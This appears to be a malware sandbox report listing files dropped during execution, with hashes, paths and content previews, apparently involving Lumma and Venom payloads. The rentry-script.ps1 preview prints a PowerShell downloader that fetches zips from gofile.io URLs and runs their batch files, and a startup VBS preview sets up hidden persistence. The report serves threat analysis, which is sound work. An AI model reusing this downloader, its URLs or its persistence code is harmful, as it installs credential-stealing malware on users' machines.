SHA-512:	636A32FB8A88A542783AA57FE047B6BCA47B2BD23B41B3902671C4E9036C6DBB97576BE27FD2395A988653E6B63714277873E077519B4A06CDC5F63D3C4224E0
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......E.1..._..._..._......._...^..._......._......._......._.Rich.._.........................PE..L.....P.....................\|............... ....@.................................-........................................!..P....P...t..........................0 ............................................... ..0............................text...5........................... ..`.rdata....... ......................@..@.data........0......................@....CRT.........@......................@..@.rsrc....t...P...v..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ht3mp5vg.n4w.psm1

Download File

Process:	C:\Users\user\AppData\Local\Temp\2D42.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nsyrnlld.nv3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nw4qc1el.vi5.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_syfdm4hx.npq.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tvmp1poy.ugs.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_v5c42fyb.j3w.ps1

Download File

Process:	C:\Users\user\AppData\Local\Temp\2D42.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\lumma.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	528925
Entropy (8bit):	7.999322324722934
Encrypted:	true
SSDEEP:	12288:xyY9C/+kpVD3KhE7vLg5C9pyKy8/i4wDW9Ns8PDjxQ1x8MjR6DngMl:xhs/+oksg5CTyYa4wa9JJbus
MD5:	C326FE916E749D691CAEDBC7851F984C
SHA1:	ABF574E081288F7FC0D270A4ABD79372C7DAA3F2
SHA-256:	6E6199329BB1C1989E8D5266A5F57119E4454A4716DC5A1D16638D4BE645C1F0
SHA-512:	EF8899ADEB8396EF207243711038217BD50E1800C6BAA2D70C869A11BDA1F21D04D1C8CBC381111BF9311385116F6A27AD1DFF3A8E72D278079FBCDB46440293
Malicious:	false
Preview:	PK.........{.X.8..(...)......data.bin..,..`......^..)....0...............uw..r.U....;??..k0..H_{ZA...k..a......e.... .uj_./.&{E....y.9..A. ..<."L\Pu..+d.. D.............V.>0...).HA;.$..Z./(..V...-..oZ.[..e...e.....6.iE[..G.064...^P..j^..H..F\E.k.N..7.u`.K......{r..'{k,...7.......$.9;:.d..!v.Lf.5B.....;<......#.lQ(Z..O{7.&5..c~...X...t.`..eu3W.......d..[..Q..c.s.dU..-.l.S.(....i..7.H...2.S....}.N......Xan...T...O3...`L.J...T...L:..]..-U.}.&..Wx%.'....q...\|m..7.\...CO..s..^......{cW.'}........'.....H.k-....G.G..}.#H.o.......C....hE8.\...N...s......N..^.\|:{...@........l..`.{.C.?...&v.Ny..4.%....\........q......................X..... O.~K.p..x..7..m......G.6Fe..u...$.s.[.....;.q..*.)\|v&....0:0..M:.!..6...7.u.....!.3...D...X....p.N.Z...t..hh6..".-..8.......?Bz.2O.....&[.:8H.R>2......K.`..\r.fb....Op..L.kcY...u...{...=i..7.".&M....!.9...w(.p..)j.....'.v.....~...h..TG)#u@.?.XN16.y.Ug .=...J+..lkg.......1D....w...O..v./.....z._.....g..0.;&9..."(^....

C:\Users\user\AppData\Local\Temp\rentry-script.ps1

Download File

Process:	C:\Users\user\AppData\Local\Temp\2D42.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2511
Entropy (8bit):	5.252889385795675
Encrypted:	false
SSDEEP:	48:mMB+fxMBQDwX7jCe9HSVdat4ZLd/FK16hiHKiK/OQ/v6/Q6RER/h0JweXuH:mM0fxMi4CQo1tg1lthpS
MD5:	882093038301A8EB3C3310CE46E1075E
SHA1:	157D0D5855C2A66DFE02E06C43B4C56C640B64E6
SHA-256:	ED089944CAF15DB2638AA0BBB7B6FC7BECD4F4D5C08C12F4922AA7BC811046A9
SHA-512:	0F2FB0F4DC18C2C0CB46897D70359D3734F7F737456860083AE9932820FD2AB58DB550F491F594D0531D9465D43BD4FAA6D5B9967716563C7A9E09AEB67DCFC9
Malicious:	true
Preview:	$url1 = "https://store4.gofile.io/download/direct/6b24ec97-2a8d-468d-a24d-c8081cda1dab/vm.zip"..$url2 = "https://store4.gofile.io/download/direct/0656c5cf-51b4-4fa4-ae48-8ee5ed3d142e/lm.zip"..$tempDir1 = [System.IO.Path]::Combine($env:TEMP, "ExtractedVenom")..$tempDir2 = [System.IO.Path]::Combine($env:TEMP, "ExtractedLumma")..$zipPath1 = [System.IO.Path]::Combine($env:TEMP, "venom.zip")..$zipPath2 = [System.IO.Path]::Combine($env:TEMP, "lumma.zip")....function Download-File {.. param (.. [string]$url,.. [string]$outputPath.. ).. Invoke-WebRequest -Uri $url -OutFile $outputPath..}....function Run-BatFiles {.. param (.. [string]$directory.. ).. $batFiles = Get-ChildItem -Path $directory -Filter *.bat -File.. foreach ($batFile in $batFiles) {.. Start-Process -FilePath "cmd.exe" -ArgumentList "/c $($batFile.FullName)" -WorkingDirectory $directory -NoNewWindow.. }..}....function Add-VbsToStartup {.. param (.. [string]$batFilePath

C:\Users\user\AppData\Local\Temp\venom.zip

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	296998
Entropy (8bit):	7.998052107159895
Encrypted:	true
SSDEEP:	6144:/3eshJ2mAOSiLZh4CPIKBZW7ZN7o8PDj6QN9Q1xipM8QHxwM4Dngzi:feshYbDi1OwDW9Ns8PDjxQ1x8MjR6Dnz
MD5:	8090D3FF2BF334B750478761C31BF25E
SHA1:	EC048B210369DD140BE8ED66D07AC4466AB5F7E4
SHA-256:	63B0E303A05AD2EB2A93E2F9CD96E50361CF1E0D29F9CAB8B0A98D1185347F8A
SHA-512:	DFBBB3468C2012BDF920B8C09DFDB655F3E1369EA9465228E505F1D1DE3AEF9EC9757D7B501C4091C3FF7859F57D2CA646430B4E5CF0E5292AB602B0FB28F654
Malicious:	false
Preview:	PK.........t.X.............data.bin..,..`......Z.......0..................`...8..k.@~CBBxED....&dI.....,.e...D3c......u.6........,...Q... .aH]?A...x.W7.c..;.f.U.....C.ZK.W...v...o....R....u-2.........#..S_....m..?...4..K...v.IlUe.........D.....R. I..h6.B.....Z}iN..H.hd....,....".n e8.p..+....8...M.D.M.s...5.$..F/...f.(........&...%....6..+.Q7..`\.1.q.g..u.d.6.A.[.=?.@...e.I......^....>......c...z..Qn1..~.+y.... .........]..C.f..GZm3.....A8..f_.r.1.8..Mar9.j.(...6K..J..>.R..jlNx.Lr..333..d.nJc Z...f.O...`.Jiz.w3...s.d.R......+..\...M......s.J.!W.......FQ(...&.j\|..1.;.}.yo.....1..Al.......6]A.nD.-.~..pz~.1...g.........................D/V"\N..c.q.nxi...8l..7.^...l.(S^...H......R......V. .u..T.....7;2...Q.)5(.0...!..../......z.]..,..!N........q...5\|V......e.:P..%._.L....xu...;.r..~.&....k.Q.@...(..o.2..h..G..Z%...N.....;".}....%7.\<...'..c....s. \0..f)7eh....M.....F.v}...}c..Gy3..I.j.@..F...\|.....K.M.$.z...aF...z.....\LB.H....}.)8$...8iV...<.'A...L.P

C:\Users\user\AppData\Local\Temp\{0580D43B-F688-43D3-96A9-BC3E3DB7707D}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Local\Temp\{508BF163-DE27-4996-B66D-947C52BD324B}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Local\Temp\{8A51086A-8CE2-4D7B-9262-7AED61F7272B}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Local\Temp\{A02B2518-0C82-48B8-9014-35CF372AF3DC}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Local\Temp\{AADB895B-BE9E-45D9-AC69-B81D7027CD73}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Local\Temp\{BCC0B1E6-22C5-4252-9A19-34A345219150}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Local\Temp\{E1132966-F788-475E-BA3B-8A61AD4B6C1A}.png

Download File

Process:	C:\Windows\explorer.exe
File Type:	PNG image data, 306 x 306, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	6886
Entropy (8bit):	7.895098216672666
Encrypted:	false
SSDEEP:	192:CLRkn2wDlA/phcXKhgkuUexVBCp5dpvO4nyWck:rnpDlA/phc6hgkEQkxVk
MD5:	099BA37F81C044F6B2609537FDB7D872
SHA1:	470EF859AFBCE52C017874D77C1695B7B0F9CB87
SHA-256:	8C98C856E4D43F705FF9A5C9A55F92E1885765654912B4C75385C3EA2FDEF4A7
SHA-512:	837E1AD7FE4F5CBC0A87F3703BA211C18F32B20DF93B23F681CBD0390D8077ADBA64CF6454A1BB28DF1F7DF4CB2CDC021D826B6EF8DB890E40F21D618D5EB07A
Malicious:	false
Preview:	.PNG........IHDR...2...2.....y.\.....sRGB.........gAMA......a.....IDATx^..K..U...2.`.K.H...h.x.0.^.i@...Y#..Y.\|..'....$/f5....a.....X."..%......y....Q.Y..q9..O.DV...T...{..Y.................................................................p..:}...v.q.S..y....T..E\|...^.0~Y.....r.R...S.d.,.....y.pjK.z.8...g,..v.A6d.\..I..v...I.n_....g.%.. ...m)....rx....J9p.......7..Kh.o..<....yw3.T....,..F~.}....E.^.C..@.\g..aX.K.^....x...Ka..zQ..@R()......%K3......A...l....^#C.Yf,....Y].L.....A;+....e)..nW._..64.U....... ..Y.../..#..FC..v8.mi.z......w..6.9.f.Z..2.,.41..............=.nKC.!..T.....ps...)..P.k8C.9c....^.C..[(...Y+.Y.u...s...v\..9/.4........+..})..m.:.^.[ .4.\|......U.0.0.4..b[..a.c....+....(..j?..a.....i..g....d..a.[vl.>..}`.....j..........M..-..x...,!..L+.'..........s77f.\|.h...0/.4\|\|......\h.......N.-.TG..$.;vh....,-......h,..*...V...}...,m....v.k......Z:f!..Hua..(.0_...B.M.3..u......R(.&..4...!..+.._...h.L....P=-..H.!5...[O.]+.d.E...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MyStartupScript.vbs

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	248
Entropy (8bit):	5.099449086851138
Encrypted:	false
SSDEEP:	6:j6NqhmCOoLPwkn23fa3r0Xewkn23fa3HfNUqOUrv:JhmCOTfS3ruZfS3+O7
MD5:	70157E3F564EB2ED1AAA45746184EFE9
SHA1:	F362A86E37D74D2BBB04E82A9CC7C728463C1AD1
SHA-256:	6C4052E5D66ED85EFA23367D7871BB4E6D93DB7C2C9CE81626B74FC9BF95E794
SHA-512:	67ACF8D42317E77E66C3CB4C56B52EF94D6EC2589616C6FD36B08C90D80E2FC01C9F9F8B8CCB02FEBC617839BBABD3685FE54BE45162295AF9F9DE323AD7F14F
Malicious:	true
Preview:	Set WshShell = CreateObject("WScript.Shell")..WshShell.CurrentDirectory = "C:\Users\user\AppData\Local\Temp\ExtractedVenom"..WshShell.Run chr(34) & "C:\Users\user\AppData\Local\Temp\ExtractedVenom\runvm.bat" & Chr(34), 0..Set WshShell = Nothing..

C:\Users\user\AppData\Roaming\MyData\DataLogs.conf

Download File

Process:	C:\Users\user\AppData\Local\Temp\ExtractedVenom\vm.exe
File Type:	ASCII text
Category:	modified
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:	3:Rt:v
MD5:	CF759E4C5F14FE3EEC41B87ED756CEA8
SHA1:	C27C796BB3C2FAC929359563676F4BA1FFADA1F5
SHA-256:	C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
SHA-512:	C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
Malicious:	false
Preview:	.5.False

C:\Users\user\AppData\Roaming\adjijwj

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	41369
Entropy (8bit):	6.598294772115452
Encrypted:	false
SSDEEP:	768:CNRArpFDnz5y+bgsDF5I0haNLj1PokgJ4T:CNRAfnzVF20MBj1PgJ4T
MD5:	ECCDCA95898D2ECCE04660FAD1209C1D
SHA1:	3BE1D8F6D6A75943C1BF7AF821D63A1701618F72
SHA-256:	7231B59295966497D4A581249D0FD69DCEF5DE7981D5B3D09039310CA0B875C2
SHA-512:	4F9F527D78AD54F606BB48A95F898D0FD66DD4020D2DEA6787B350EAEA85D2CF25E841E7D05A805BB21DBB6520507FD277E20E61AEC11D9B8A48DB77F041A63D
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L.....f...............H............+2............@.................................G................................................................................................................................................................text...r........................... ...................................................................................................N...4.%.....(.Hv....)TK...@............Q.....:...V1...Q..Ye._K..~...._L...`.3a&..x..T..g.....;?l.y....`3..D...&4.o.j..........3[y..u.d]..%..R.Z_....;.'...r....u...S.oO.av..8>/.......+.}..%.S.4......#Wh.bM]..O4..`B.b6%$....G'......?.Zg.f.[.........kJ.=<.xJ'.....l..B@..eO.(....y....#...;g8..-F.N;.%G..6.1.}<D:.. 8..BN6...&.....5..n'.. ....a....VS.~..^.v...w..j..._P...=.lZ.....p.6...t.u.....Wt.u.K.Ef..V.....u.t..v....t$.............................q..V.<$.....-

